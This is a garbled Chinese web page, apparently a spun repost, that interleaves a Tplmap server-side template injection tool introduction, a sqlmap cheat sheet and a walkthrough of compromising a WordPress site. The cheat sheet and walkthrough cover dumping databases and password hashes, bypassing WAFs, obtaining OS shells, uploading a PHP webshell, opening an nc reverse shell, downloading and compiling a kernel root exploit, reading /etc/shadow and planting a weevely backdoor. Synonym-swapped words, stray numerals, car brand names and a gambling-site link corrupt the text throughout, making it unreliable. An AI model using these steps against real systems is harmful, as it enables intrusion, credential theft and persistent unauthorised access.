举目4望服务器端模板注入漏洞的开源工具,注入神器sqlmap

原标题:Tplmap – 扫描服务器端模板注入漏洞的开源工具

 

1、查询数据

举目4望服务器端模板注入漏洞的开源工具,注入神器sqlmap。借使黑客要凌犯的你的网站域名叫:hack-test.com

Tplmap是1个python工具,能够由此采纳沙箱转义技术找到代码注入和劳动器端模板注入(SSTI)漏洞。该工具能够在不少模板引擎中利用SSTI来访问指标文件或操作系统。一些受扶助的沙盘引擎包蕴PHP(代码评估),Ruby(代码评估),Jave(代码评估),Python(代码评估),ERB,Jinja二和Tornado。该工具得以实施对这一个模板引擎的盲注入,并兼有实践远程命令的力量。

Sqlmap:

  • 貌似注入流程:
  • sqlmap -u “www.ONDragon.com/ONDragon?id=①” –dbs   查看全数数据库

    sqlmap -u "www.ONDragon.com/ONDragon?id=1" --current-db 查看当前数据库
    
    sqlmap -u "www.ONDragon.com/ONDragon?id=1" --user       查看数据库用户名
    
    sqlmap -u "www.ONDragon.com/ONDragon?id=1" --current-user  查看当前用户名 
    
    sqlmap -u "www.ONDragon.com/ONDragon?id=1" --is-dba     判断权限
    
    sqlmap -u "www.ONDragon.com/ONDragon?id=1" –privileges  判断权限
    
    sqlmap -u "www.ONDragon.com/ONDragon?id=1" --passwords  枚举密码哈希
    
    sqlmap -u "www.ONDragon.com/ONDragon?id=1" --tables -D database'name    获取数据库的表名
    
    sqlmap -u "www.ONDragon.com/ONDragon?id=1" -D database'name -T table'name --columns   获取数据库对应表的字段
    
    sqlmap -u "www.ONDragon.com/ONDragon?id=1" -D database'name -T table'name -C column'name --dump  获取数据库对应表的字段的值   --dump-all  获取所有内容
    
  • -u (get型注入)

    sqlmap -u “www.ONDragon.com/?ONDragon=1”

  • –data (post型注入)

    sqlmap -u “www.ONDragon.com/ONDragon” –data=”user=admin&pass=pass”
    sqlmap -r requests.txt 读取http包进行机动post注入(也足以进去http底部的任性地点注入,只要在注入地点进入 * 即可)
    sqlmap “www.ONDragon.com” –forms

  • –coockie (cookie注入)

    sqlmap -u “www.ONDragon.com/ONDragon” –cookie=”user=admin&pass=pass” –level 2 (level 大于2就行)

  • –batch
    (自动选用sqlmap暗中同意选项)

  • -p  (参数选拔)

    sqlmap -u “www.ONDragon.com” –forms -p admin

1.ACCESS数据库:

sqlmap.py -u “url”
/*-u为常规扫描参数*/

sqlmap.py -u “url” –tables
/*–tables拆数据库表*/

sqlmap.py -u “url” –columns -T
“要拆的表名”/*列出钦定表名*/

sqlmap.py -u “url” –dump -T “要拆的表名”-C
“要拆的字段名” /*–dump为拆毁字段名会保存在sqlmap/output目录下*/

2.MYSQL数据库:

sqlmap.py -u “url” /*举目4望注入点*/

sqlmap.py -u “url” –dbs
/*列出具有数据库*/

sqlmap.py -u “url” –current-db
/*列出最近数据库*/

sqlmap.py -u “url” –current-user
/*列出如今用户*/

sqlmap.py -u “url” –tables -D
“当前多少库名” /*拆解当前数码库表*/

sqlmap.py -u “url” –columns -T
“要拆得的表名” -D “当前数据库名” /*拆除钦命表字段名*/

sqlmap.py -u “url” –dump -C “字段名” -T
“表名” -D “当前数据库”

3.SQLSERVER数据库:

sqlmap.py -u “url” /*环视注入点*/

sqlmap.py -u “url” –dbs
/*列出富有数据库*/

sqlmap.py -u “url” –current-db
/*列出当下数据库*/

sqlmap.py -u “url” –current-user
/*列出方今用户*/

sqlmap.py -u “url” –tables -D
“当前数据库名” /*拆解当前多少库表*/

sqlmap.py -u “url” –columns -T
“要拆得的表名” -D “当前多少库名” /*拆除钦命表字段名*/

sqlmap.py -u “url” –dump -C “字段名” -T
“表名” -D “当前数据库”

SQLSE兰德酷路泽VERAV4操作和MYSQL是平等的!!!常见的两种数据库!!!

4.COOKIE注入:

sqlmap.py -u
“www.xxx.com/asp或然www.xxx.com/php” –cookie “参数名如id=一” –level
2/*level为晋级权限*/

何以数据库就依据下边包车型大巴数据库加上cookie语句拆解就行了

5.POST注入:

抓包保存到SQLMAP目录下.txt的文书然后输入指令sqlmap.py
-r xxx.txt /*xxx.txt为保存包文件的文件名”

sqlmap.py -u “url” –data “POST参数”

6.执行shell命令:

sqlmap.py -u “url” –os-cmd=”net user”
/*执行net user命令*/

sqlmap.py -u “url” –os-shell
/*系统互相的shell*/

7.注入HTTP请求 :

sqlmap.py -r xxx.txt –dbs
/*xxx.txt内容为HTTP请求*/

8.绕过WAF的tamper插件使用:

sqlmap.py -u “url” –tamper “xxx.py”

sqlmap.py -u “url” –tamper=”xxx.py”

有关tamper脚本详细表明在本博客中有,链接为:

玖.将注入语句插入到钦定地方:

sqlmap.py -u
“url(www.xxx.com/id/1*.html)” –dbs

稍稍网站是选拔伪静态的页面使用SQLMAP的通常注入是老大的,所以SQLMAP提供了”*”参数将SQL语句插入钦点地方,1般用于伪静态注入。

在行使HTTP注入时利用-r参数也足以直接在文书中增添*号

10.延时注入:

sqlmap –dbs -u “url” –delay 0.5
/*延时0.5秒*/

sqlmap –dbs -u “url” –safe-freq
/*请求2次*/

11.应用谷歌(谷歌)语法搜索注入(Googlehack):

sqlmap.py -g “inurl:asp?id=1”
/*””内为寻觅语法,如:inurl,intitle,site,filetype等等。


Options(选项):

–version 显示程序的版本号并退出

-h, –help 展现此支持音讯并脱离

-v VE本田UR-VLibratone 详细等第:0-陆(私下认可为1)

Target(目标):

以下至少必要设置在那之中1个摘取,设置目的ULX570L。

-d DIRECT 直接连接到数据库。

-u URL, –url=URL 目标URL。

-l LIST
从Burp或WebScarab代理的日记中剖析指标。

-r REQUESTFILE
从2个文书中载入HTTP请求。

-g GOOGLEDOBMWX3K 处理谷歌dork的结果作为靶子U奇骏L。

-c CONFIGFILE
从INI配置文件中加载选项。

Request(请求):

这一个选拔能够用来内定如何连接到目的URubiconL。

–data=DATA 通过POST发送的数目字符串

–cookie=COOKIE HTTP Cookie头

–cookie-urlencode U凯雷德L
编码生成的cookie注入

–drop-set-cookie 忽略响应的Set –
库克ie头消息

–user-agent=AGENT 指定 HTTP User –
Agent头

–random-agent 使用随机选定的HTTP User –
Agent头

–referer=REFERER 指定 HTTP
Referer头

–headers=HEADELANDS
换行分开,参与其余的HTTP头

–auth-type=ATYPE
HTTP身份验证类型(基本,摘要或NTLM)(Basic, Digest or NTLM)

–auth-cred=ACRED
HTTP身份验证凭据(用户名:密码)

–auth-cert=ACE奥迪Q7T
HTTP认证证书(key_file,cert_file)

–proxy=PROXY
使用HTTP代理连接到对象UEnclaveL

–proxy-cred=PCRED
HTTP代理身份验证凭据(用户名:密码)

–ignore-proxy 忽略系统默许的HTTP代理

–delay=DELAY
在各类HTTP请求之间的延迟时间,单位为秒

–timeout=TIMEOUT
等待连接超时的年华(暗中同意为30秒)

–retries=RETMuranoIES
连接超时后重新连接的岁月(暗许叁)

–scope=SCOPE
从所提供的代理日志中过滤器目的的正则表明式

–safe-url=SAFU凯雷德L
在测试进度中常常访问的url地址

–safe-freq=SAFREQ
几遍访问之间测试请求,给出安全的U福特ExplorerL

Optimization(优化):

那几个选用可用于优化SqlMap的质量。

-o 开启全部优化按键

–predict-output 预测常见的查询输出

–keep-alive 使用持久的HTTP(S)连接

–null-connection
从不曾实际的HTTP响应体中追寻页面长度

–threads=THREADS
最大的HTTP(S)请求并发量(默许为一)

Injection(注入):

那个选取能够用来钦命测试哪些参数,
提供自定义的注入payloads和可选篡改脚本。

-p TESTPARAMETELacrosse 可测试的参数(S)

–dbms=DBMS 强制后端的DBMS为此值

–os=OS
强制后端的DBMS操作系统为这几个值

–prefix=PREFIX
注入payload字符串前缀

–suffix=SUFFIX
注入payload字符串后缀

–tamper=TAMPEPRADO使用给定的脚本(S)篡改注入数据

Detection(检测):

这么些选用能够用来钦赐在SQL盲注时怎样分析和比较HTTP响应页面的内容。

–level=LEVEL
执行测试的品级(壹-5,私下认可为1)

–risk=RubiconISK
执行测试的高风险(0-3,私下认可为壹)

–string=ST库罗德ING
查询时有效时在页面相称字符串

–regexp=REGEXP
查询时有效时在页面相称正则表明式

–text-only 仅依据在文件内容相比网页

Techniques(技巧):

那么些接纳可用于调整具体的SQL注入测试。

–technique=TECH
SQL注入技术测试(私下认可BEUST)

–time-sec=TIMESEC
DBMS响应的延迟时间(暗中同意为5秒)

–union-cols=UCOLS
定列范围用于测试UNION查询注入

–union-char=UCHARubicon用于暴力猜解列数的字符

Fingerprint(指纹):

-f, –fingerprint
执行检查广泛的DBMS版本指纹

Enumeration(枚举):

那些采用能够用来列举后端数据库管理种类的新闻、表中的布局和数码。其它,您还足以运作您本人

的SQL语句。

-b, –banner
检索数据库管理连串的标识

–current-user
检索数据库管理连串当下用户

–current-db
检索数据库管理种类当下数据库

–is-dba 检查评定DBMS当前用户是还是不是DBA

–users 枚举数据库管理体系用户

–passwords
枚举数据库管理连串用户密码哈希

–privileges
枚举数据库管理连串用户的权杖

–roles 枚举数据库管理类别用户的角色

–dbs 枚举数据库管理连串数据库

–tables 枚举的DBMS数据库中的表

–columns 枚举DBMS数据库表列

–dump
转储数据库管理系列的数据库中的表项

–dump-all
转储全部的DBMS数据库表中的条规

–search
找寻列(S),表(S)和/或数据库名称(S)

-D DB 要拓展枚举的数量库名

-T TBL 要拓展枚举的数码库表

-C COL 要开始展览枚举的多少库列

-U USE安德拉 用来进行枚举的数据库用户

–exclude-sysdbs
枚举表时排除系统数据库

–start=LIMITSTA奥迪Q5T
第贰个查询输出进入检索

–stop=LIMITSTOP
最后查询的输出进入检索

–first=FI宝马X3STCHA中华V第3个查询输出字的字符检索

–last=LASTCHAOdyssey最后查询的出口字字符检索

–sql-query=QUETucsonY 要实践的SQL语句

–sql-shell 提示交互式SQL的shell

Brute force(蛮力):

那几个选取能够被用来运维蛮力检查。

–common-tables 检查存在共同表

–common-columns 检查存在共同列

User-defined function
injection(用户自定义函数注入):

那些接纳能够用来创建用户自定义函数。

–udf-inject 注入用户自定义函数

–shared-lib=SHLIB 共享库的本土路径

File system
access(访问文件系统):

那几个选取能够被用于访问后端数据库管理体系的底层文件系统。

–file-read=RubiconFILE
从后端的数据库管理系统文件系统读取文件

–file-write=WFILE
编辑后端的数据库管理系统文件系统上的当麻芋果件

–file-dest=DFILE
后端的数据库管理类别写入文件的相对路径

Operating system
access(操作系统访问):

这个选取能够用来访问后端数据库管理序列的底层操作系统。

 

–os-cmd=OSCMD 执行操作系统命令

–os-shell 交互式的操作系统的shell

–os-pwn 获取3个OOB
shell,meterpreter或VNC

–os-smbrelay 一键获取3个OOB
shell,meterpreter或VNC

–os-bof 存款和储蓄进程缓冲区溢出利用

–priv-esc 数据库进度用户权限提高

–msf-path=MSFPATH Metasploit Framework本地的安装路径

–tmp-path=TMPPATH
远程一时半刻文件目录的相对路径

Windows注册表访问:

这几个接纳能够被用于访问后端数据库管理体系Windows注册表。

–reg-read 读3个Windows注册表项值

–reg-add
写二个Windows注册表项值数据

–reg-del 删除Windows注册表键值

–reg-key=REGKEY Windows注册表键

–reg-value=REGVAL Windows注册表项值

–reg-data=REGDATA
Windows注册表键值多少

–reg-type=REGTYPE
Windows注册表项值类型

General(一般):

这一个选取能够用来安装有个别相似的做事参数。

亚洲必赢登录,-t TRAFFICFILE
记录全体HTTP流量到2个文书文件中

-s SESSIONFILE
保存和死灰复燃检索会话文件的持有数据

–flush-session
刷新当前目的的对话文件

–fresh-queries
忽略在对话文件中储存的询问结果

–eta 呈现每一种输出的前瞻达到时刻

–update 更新SqlMap

–save file保存选项到INI配置文件

–batch
从不询问用户输入,使用具有暗中同意配置。

Miscellaneous(杂项):

–beep 发现SQL注入时提示

–check-payload
IDS对流入payloads的检查评定测试

–cleanup
SqlMap具体的UDF和表清理DBMS

–forms 对目的U大切诺基L的分析和测试情势

–gpage=GOOGLEPAGE
从钦点的页码使用谷歌(谷歌)dork结果

–page-rank 谷歌(Google)dork结果显示网页排行(PRubicon)

–parse-errors
从响应页面解析数据库管理系列的荒谬音讯

–replicate
复制转储的数目到一个sqlite叁数据库

–tor 使用私下认可的Tor(Vidalia/ Privoxy/
Polipo)代理地址

–wizard 给初级用户的轻便向导界面

./sqlmap.py -u “ sqlmap
提示 do you want to include all tests for ‘Microsoft SQL Server’
extending provided level (1) and risk (1)? [Y/n]  选 y

让大家用ping命令获取网址服务器的IP地址.

安装Tplmap

提醒参数 id 有漏洞,是还是不是要保持别的测试,按 y 回车确定 GET parameter ‘id’
is vulnerable. Do you want to keep testing the others (if any)? [y/N]

 

亚洲必赢登录 1

获得具有数据库名 因为已经了解数据库名称为微软的 sql
server,为了加速检验速度,内定数据库参数 –dbms=mssql ./sqlmap.py -u
“” –dbms=mssql –dbs

近日大家获得了网址服务器的IP地址为:17三.23六.13八.1一三

能够经过行使以下github链接从github存款和储蓄Cook隆该工具来安装Tplmap。

当前网页连接数据库名 ./sqlmap.py -u
“” –dbms=mssql
–current-db

寻觅相同服务器上的其余网址,我们使用sameip.org.

git clone

点名数据库全数表 ./sqlmap.py -u
“” –dbms=mssql –table
-D “testdb”

 

事业有成安装后,将引得路径改造为tplmap安装文件以运转tplmap.py。

读取钦命表中的字段名 ./sqlmap.py -u
“” –dbms=mssql -D
“testdb” -T “admin” –columns

26 sites hosted on IP Address 173.236.138.113

测试Web应用程序中的漏洞

读取钦命字段内容 ./sqlmap.py -u
“” –dbms=mssql -D
“testdb” -T “admin” –dump -C “username,password”

ID

Domain

Site Link

1

hijackthisforum.com

hijackthisforum.com

2

sportforum.net

sportforum.net

3

freeonlinesudoku.net

freeonlinesudoku.net

4

cosplayhell.com

cosplayhell.com

5

videogamenews.org

videogamenews.org

6

gametour.com

gametour.com

7

qualitypetsitting.net

qualitypetsitting.net

8

brendanichols.com

brendanichols.com

9

8ez.com

8ez.com

10

hack-test.com

hack-test.com

11

kisax.com

kisax.com

12

paisans.com

paisans.com

13

mghz.com

mghz.com

14

debateful.com

debateful.com

15

jazzygoodtimes.com

jazzygoodtimes.com

16

fruny.com

fruny.com

17

vbum.com

vbum.com

18

wuckie.com

wuckie.com

19

force5inc.com

force5inc.com

20

virushero.com

virushero.com

21

twincitiesbusinesspeernetwork.com

twincitiesbusinesspeernetwork.com

22

jennieko.com

jennieko.com

23

davereedy.com

davereedy.com

24

joygarrido.com

joygarrido.com

25

prismapp.com

prismapp.com

26

utiligolf.com

utiligolf.com

Tplmap不仅接纳了文件系统的尾巴,而且还兼具应用不相同参数访问底层操作系统的力量。以下显示器截图呈现了可用以访问操作系统的比不上参数选项

二、执行系统命令

17三.23陆.13八.11三上有2几个网址,很多黑客为了抢占你的网址大概会检查同服务器上的任何网址,可是此次是以研究为对象,大家将抛开服务器上的此外网址,只针对你的网址来拓展侵略检查测试。

亚洲必赢登录 2

./sqlmap.py -u “”
–dbms=mssql –os-shell –threads=10

We’ll need more information about your site, such as:

以下命令可用来测试指标UCRUISERL中的易受攻击的参数。

三、常见参数

咱俩需求有关您网址的以下音信:

./tplmap.py -u <‘指标网址’>

流入点 HTTP 钦定请求方法检测 POST
–data=”password=8895263四&rem=on&username=8895263肆”

  1. DNS records (A, NS, TXT, MX and SOA)
  2. Web Server Type (Apache, IIS, Tomcat)
  3. Registrar (the company that owns your domain)
  4. Your name, address, email and phone
  5. Scripts that your site uses (php, asp, asp.net, jsp, cfm)
  6. Your server OS (Unix,Linux,Windows,Solaris)
  7. Your server open ports to internet (80, 443, 21, etc.)

实施该命令后,该工具会针对多个插件测试对象U福睿斯L以搜寻代码注入机会。

Cookie –cookie “cookie value” 登录检查测试

让大家开头找你网站的DNS记录,我们用who.is来形成这一指标.

亚洲必赢登录 3

流入查询数据技术 –technique=U  钦赐 Union 技术

 

要是发现破绽,该工具将出口有关目的中或然注入点的详细新闻。那几个包括GET参数值(无论是id依旧名称),模板引擎(例如Tornado),OS(例如Linux)和注入技术(例如渲染,盲)。

流入 HTTP 全数办法注入检查实验 –level三  检验 HTTP
方法深度,GET、POST、库克ie、User-agent 和 Referer

小编们发现你的DNS记录如下

亚洲必赢登录 4

Base64 编码 url 注入点 sqlmap -u
–tamper
base64encode.py

 

对此易受攻击的对象操作系统,能够接纳前边提到的个中3个参数重国民党的新生活运动行tplmap命令。例如,大家能够因而以下格局将-os
-shell选项与tplmap命令一起使用。

检查实验 DBMS 当前用户是还是不是 DBA(注入点执行操作系统命令壹般供给 DBA 权限)
–is-dba

让我们来显明web服务器的门类

./tplmap.py –os-shell -u <‘目的网站’>

未曾询问用户输入,使用具有默许配置 –batch

 

-os -shell选项在指标操作系统上运维伪终端以实施所需的代码。

暗许最大线程数为 十 –threads=10

意识你的W eb服务器是apache,接下去明确它的版本.

小说出处:latesthackingnews归来腾讯网,查看更加多

  1. #HiRoot’s Blog  

HACK-TEST.COM SITE INFORMATION

主编:

 2. Options(选项):  

IP: 173.236.138.113
Website Status: active
Server Type: Apache
Alexa Trend/Rank:  1 Month: 3,213,968 3 Month: 2,161,753
Page Views per Visit:  1 Month: 2.0 3 Month: 3.7

 叁. –version 显示程序的版本号并退出 

接下去是时候寻觅你网址域名的注册消息,你的对讲机、邮箱、地址等.

 四. -h, –help 展现此帮助新闻并脱离

 

  5. -v VEPRADOHiFiman 详细等第:0-6(暗中同意为 一)

我们今后曾经收获了你的网址域名的挂号音信,蕴含你的要紧新闻等.大家得以因而backtrack 5中的whatweb来取得你的网址服务器操作系统类型和服务器的版本.

6.    7. Target(目标): 

 

 八. 以下至少供给设置当中三个摘取,设置指标 UTiguanL。

 

9.   

俺们发现你的网站采纳了名牌的php整站程序wordpress,服务器的的系统项目为Fedora Linux,Web服务器版本Apache 贰.二.15.持续翻看网址服务器开放的端口,用渗透测试工具nmap:

 十. -d DIRECT 直接连接到数据库。 

1-Find services that run on server(查看服务器上运维的劳务)

 11. -u URL, –url=URL 目标 URL。 

贰-Find server OS(查看操作系统版本)

 1二. -l LIST 从 Burp 或 WebScarab 代理的日记中剖析指标。

唯有80端口是开放的,操作系统是Linux贰.6.2贰(Fedora Core 六),今后大家早已征集了独具有关您网址的关键音讯, 接下来开头扫描寻觅漏洞,比如:

  一三. -r REQUESTFILE 从一个文本中载入 HTTP 请求。 

Sql injection – Blind sql injection – LFI – RFI – XSS – CSRF 等等.

 1四. -g GOOGLEDORAV4K 处理 谷歌(Google) dork 的结果作为对象 U安德拉L。

咱俩将采纳Nikto来收集漏洞音信:

  15. -c CONFIGFILE 从 INI 配置文件中加载选项。

root@bt:/pentest/web/nikto# perl nikto.pl -h hack-test.com

16.    

大家也会用到Backtrack 伍 哈弗第11中学的W3AF 工具:

  1. Request(请求)

  2. 这几个选取能够用来钦赐怎样连接到指标 UEscortL。

root@bt:/pentest/web/w3af# ./w3af_gui

19.   

 

 20. –data=DATA 通过 POST 发送的数码字符串  

咱俩输入要检查评定的网址地址,接纳完整的天水审计选项.

  1. –cookie=COOKIE HTTP Cookie 头 

 

 2二. –cookie-urlencode U智跑L 编码生成的 cookie 注入 

稍等一会,你将会看到扫描结果.

 二三. –drop-set-cookie 忽略响应的 Set – Cookie 头音讯 

 

 24. –user-agent=AGENT 指定 HTTP User – Agent 头 

察觉你的网站存在sql注入漏洞、XSS漏洞、以及此外的漏洞.让我们来探寻SQL注入漏洞.

 贰5. –random-agent 使用随机选定的 HTTP User – Agent 头

%27z%220

  26. –referer=REFERER 指定 HTTP Referer 头  

大家通过工具发现那些U奥迪Q7L存在SQL注入,大家经过Sqlmap来检查评定那些url.

  1. –headers=HEADE宝马7系S 换行分开,出席其余的 HTTP 头

Using sqlmap with –u url

  2捌. –auth-type=ATYPE HTTP 身份验证类型(基本,摘要或 NTLM)

 

(Basic, Digest or NTLM) 

过壹会你汇合到

 2玖. –auth-cred=ACRED HTTP 身份验证凭据(用户名:密码)

 

  30. –auth-cert=ACE科雷傲T HTTP 认证证书(key_file,cert_file)

输入N按回车键继续

  3一. –proxy=PROXY 使用 HTTP 代理连接到对象 UTucsonL

 

  1. –proxy-cred=PCRED HTTP 代理身份验证凭据(用户名:密码) 

我们发现你的网址存在mysql显错注入,mysql数据库版本是五.0. 大家因此参预参数”-dbs”来品尝采集数据库名.

 3三. –ignore-proxy 忽略系统暗中认可的 HTTP 代理 

 

 34. –delay=DELAY 在各样 HTTP 请求之间的延迟时间,单位为秒 

 

 35. –timeout=TIMEOUT 等待连接超时的时刻(默许为 30 秒) 

发现四个数据库,接下去通过参数”-D wordpress -tables”来查看wordpress数据库的兼具表名

 3陆. –retries=RET昂科雷IES 连接超时后再行连接的小时(暗中同意 三)

 

  三七. –scope=SCOPE 从所提供的代理日志中过滤器指标的正则表达式 

 

 3捌. –safe-url=SAFUOdysseyL 在测试进度中时常访问的 url 地址  

经过参数“-T wp_users –columns
”来查看wp_users表中的字段.

  1. –safe-freq=SAFREQ 一回访问之间测试请求,给出安全的 U奥迪Q3L

 

40.    41. Optimization(优化):

 

  4贰. 那些采纳可用于优化 SqlMap 的习性。

接下去猜解字段user_login和user_pass的值.用参数”-C user_login,user_pass –dump”

43.   

 

 4四. -o 开启全体优化按键  

咱俩会意识用户名和密码hashes值.
大家供给通过以下在线破解网址来破解密码hashes

 4伍. –predict-output 预测常见的询问输出

  4陆. –keep-alive 使用持久的 HTTP(S)连接 

 

 四七. –null-connection 从不曾实际的 HTTP 响应体中寻找页面长度 

登陆wordpress的后台wp-admin

 4八. –threads=THREADS 最大的 HTTP(S)请求并发量(私下认可为 一)

尝试上传php webshell到服务器,以有益运营壹些linux命令.在插件页面寻找其余能够编制的插件. 我们挑选Textile那款插件,编辑插入大家的php webshell,点击更新文件,然后访问大家的php webshell.

49.    50. Injection(注入):  

 

 51. 那么些采用能够用来内定测试哪些参数, 提供自定义的流入 payloads
和可选篡改脚 本。

Php webshell被分析了,大家得以决定你网址的公文,可是大家只希望收获网址服务器的root权限,来凌犯服务器上别的的网址。

52.   

我们用NC来反弹3个shell,首先在我们的总计机上监听555伍端口.

 53. -p TESTPARAMETE卡宴 可测试的参数(S)  

 

  1. –dbms=DBMS 强制后端的 DBMS 为此值 

接下来在Php webshell上反向连接大家的处理器,输入你的IP和端口555伍.

 5伍. –os=OS 强制后端的 DBMS 操作系统为这几个值

点击连接我们会看到

  1. –prefix=PREFIX 注入 payload 字符串前缀 

接下去大家品尝推行1些下令:

 五柒. –suffix=SUFFIX 注入 payload 字符串后缀  

id

  1. –tamper=TAMPE奥德赛 使用给定的剧本(S)篡改注入数据

uid=48(apache) gid=489(apache) groups=489(apache)
(用来显示用户的id和组)

59.    60. Detection(检测): 

pwd

 陆1. 那些采取能够用来钦点在 SQL 盲注时如何剖析和相比较 HTTP
响应页面包车型地铁始末。

/var/www/html/Hackademic_RTB1/wp-content/plugins
(突显服务器上如今的不贰秘诀)

62.   

uname -a

 陆3. –level=LEVEL 执行测试的级差(一-5,默许为 一)

Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat Nov 7 21:41:45
EST 2009 i686 i686 i386 GNU/Linux
(展现内核版本音讯)

  64. –risk=大切诺基ISK 执行测试的高危害(0-3,暗中同意为 一)

 

 65. –string=STEnclaveING 查询时有效时在页面相配字符串

后天大家领略,服务器的内核版本是2.6.3壹.伍-12七.fc1二.168陆,大家在exploit-db.com中找找此版本的连带漏洞.
在服务器上测试了很多exp之后,大家用以下的exp来升高权限.

  1. –regexp=REGEXP 查询时有效时在页面相配正则表明式 

我们在nc shell上执行以下命令:
wget -o roro.c
(下载exp到服务器同样珍惜命名叫roro.c)
注:很多linux内核的exp都以C语言开垦的,由此大家保留为.c扩张名.
exp roro.c代码如下:

 陆7. –text-only 仅遵照在文件内容相比较网页

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <errno.h>
#include <string.h>
#include <sys/ptrace.h>
#include <sys/utsname.h>
#define RECVPORT 5555
#define SENDPORT 6666
int prep_sock(int port)
{
int s, ret;
struct sockaddr_in addr;
s = socket(PF_RDS, SOCK_SEQPACKET, 0);
if(s < 0)
{
printf(“[*] Could not open socket.\n”);
exit(-1);
}
memset(&addr, 0, sizeof(addr));
经过以上代码我们发现该exp是C语言开采的,大家必要将他编写翻译成elf格式的,命令如下:

68.    69. Techniques(技巧):  

gcc roro.c –o roro

 70. 这一个选用可用以调整具体的 SQL 注入测试。

接下去执行编写翻译好的exp

7一.    72. –technique=TECH SQL 注入技术测试(默许 BEUST) 

./roro

 7三. –time-sec=TIMESEC DBMS 响应的延迟时间(私下认可为 伍 秒) 

实施到位未来大家输入id命令

 7四. –union-cols=UCOLS 定列范围用于测试 UNION 查询注入  

id

  1. –union-char=UCHA奥迪Q三 用于暴力猜解列数的字符

咱俩发现我们已经是root权限了

76.    77. Fingerprint(指纹): 

uid=0(root) gid=0(root)

 78. -f, –fingerprint 执行检查广泛的 DBMS 版本指纹

最近我们得以查看/etc/shadow文件
cat /etc/shadow

79.    80. Enumeration(枚举):

查看/etc/passwd 文件

  8一.
那些选择能够用来列举后端数据库管理类别的消息、表中的协会和数量。别的,您
还足以运作您本身

cat /etc/passwd

  1. 的 SQL 语句。 

我们能够运用”john the
ripper”工具破解全体用户的密码.不过咱们不会这么做,大家需求在这几个服务器上预留后门以方便大家在任哪天候访问它.

 八三. -b, –banner 检索数据库管理连串的标识 

作者们用weevely制作三个php小马上传到服务器上.

 八4. –current-user 检索数据库管理系列当下用户 

1.weevely运用选择
root@bt:/pentest/backdoors/web/weevely# ./main.py –

 85. –current-db 检索数据库管理种类当下数码库 

 

 八⑥. –is-dba 检查实验 DBMS 当前用户是还是不是 DBA 

二.用weevely创设3个密码为koko的php后门

 八7. –users 枚举数据库管理体系用户

root@bt:/pentest/backdoors/web/weevely# ./main.py -g -o hax.php -p
koko

  88. –passwords 枚举数据库管理类别用户密码哈希 

 

 8玖. –privileges 枚举数据库管理体系用户的权位 

接下去上流传服务器之后来接纳它
root@bt:/pentest/backdoors/web/weevely# ./main.py -t -u
-p
koko

 90. –roles 枚举数据库管理种类用户的剧中人物 

测试大家的hax.php后门

 九1. –dbs 枚举数据库管理类别数据库  

 

 九二. –tables 枚举的 DBMS 数据库中的表 

总结:

 9三. –columns 枚举 DBMS 数据库表列 

在那边小说中大家学到的一部分技能正被黑客用来侵袭你的网址和服务器,我们盼望能由此这篇文章能够对您未来爱慕服务器和网址安全全数扶助.

 玖四. –dump 转储数据库管理种类的数据库中的表项  

本文只是用来学学精通Web安全的相干文化,原来的小说链接:

  1. –dump-all 转储全数的 DBMS 数据库表中的条目 

 九陆. –search 搜索列(S),表(S)和/或数据库名称(S)

 

  九七. -D DB 要拓展枚举的数据库名  

 玖八. -T TBL 要拓展枚举的数据库表  

 9九. -C COL 要开始展览枚举的数据库列

  1. -U USEKoleos 用来进展枚举的数据库用户  

  2. –exclude-sysdbs 枚举表时排除系统数据库  

  3. –start=LIMITSTAEscortT 第三个查询输出进入检索  

  4. –stop=LIMITSTOP 最终查询的出口进入检索  

  5. –first=FIRSTCHAENVISION 先是个查询输出字的字符检索  

  6. –last=LASTCHA悍马H2 最终查询的出口字字符检索  

 10六. –sql-query=QUELANDY 要推行的 SQL 语句 

 十七. –sql-shell 提醒交互式 SQL 的 shell

108.    109. Brute force(蛮力):  

 110. 那几个选用能够被用来运营蛮力检查。

11一.    112. –common-tables 检查存在共同表  

 11三. –common-columns 检查存在共同列

114.    1一五. User-defined function injection(用户自定义函数注入):

  1. 这个采取能够用来创立用户自定义函数。

117.    118. –udf-inject 注入用户自定义函数  

 11九. –shared-lib=SHLIB 共享库的地方路径

120.    1二一. File system access(访问文件系统): 

 122. 这个选用能够被用于访问后端数据库管理种类的尾巴部分文件系统。

1二三.    1二四. –file-read=TucsonFILE 从后端的数据库管理系统文件系统读取文件 

  1. –file-write=WFILE 编辑后端的数据库管理系统文件系统上的当和姑件 
  2. –file-dest=DFILE 后端的数据库管理类别写入文件的相对路径

127.    128. Operating system access(操作系统访问): 

 12玖. 那几个接纳能够用于访问后端数据库管理种类的平底操作系统。

130.    13一. –os-cmd=OSCMD 执行操作系统命令  

 13二. –os-shell 交互式的操作系统的 shell  

 13叁. –os-pwn 获取一个 OOB shell,meterpreter 或 VNC  

  1. –os-smbrelay 1键获取2个 OOB shell,meterpreter 或 VNC

  2. –os-bof 存款和储蓄进度缓冲区溢出利用  

 13陆. –priv-esc 数据库进度用户权限进步  

 1叁七. –msf-path=MSFPATH Metasploit Framework 本地的装置路径  

  1. –tmp-path=TMPPATH 远程一时半刻文件目录的相对路径

139.    140. Windows 注册表访问: 

 1肆一. 这几个选用能够被用来访问后端数据库管理体系 Windows 注册表。

14二.    1四3. –reg-read 读一个 Windows 注册表项值 

  1. –reg-add 写三个 Windows 注册表项值数据  

  2. –reg-del 删除 Windows 注册表键值 

 1四六. –reg-key=REGKEY Windows 注册表键  

  1. –reg-value=REGVAL Windows 注册表项值  

  2. –reg-data=REGDATA Windows 注册表键值多少  

 14玖. –reg-type=REGTYPE Windows 注册表项值类型

150.    151. General(一般):

15二.    一5三. 这么些选拔可以用来安装有个别形似的做事参数。 

  1. -t TRAFFICFILE 记录全体 HTTP 流量到1个文书文件中 

 15伍. -s SESSIONFILE 保存和回复检索会话文件的持有数据  

  1. –flush-session 刷新当前目的的对话文件 

 壹5七. –fresh-queries 忽略在对话文件中储存的查询结果  

  1. –eta 呈现每一种输出的前瞻到达时刻  

 15玖. –update 更新 SqlMap  160. –save file 保存选项到 INI 配置文件 

 1陆1. –batch 从不询问用户输入,使用具有暗中认可配置。

162.    163. Miscellaneous(杂项): 

 16四. –beep 发现 SQL 注入时提醒

  1陆五. –check-payload IDS 对流入 payloads 的检查实验测试  

 16陆. –cleanup SqlMap 具体的 UDF 和表清理 DBMS  

  1. –forms 对指标 U卡宴L 的分析和测试格局 

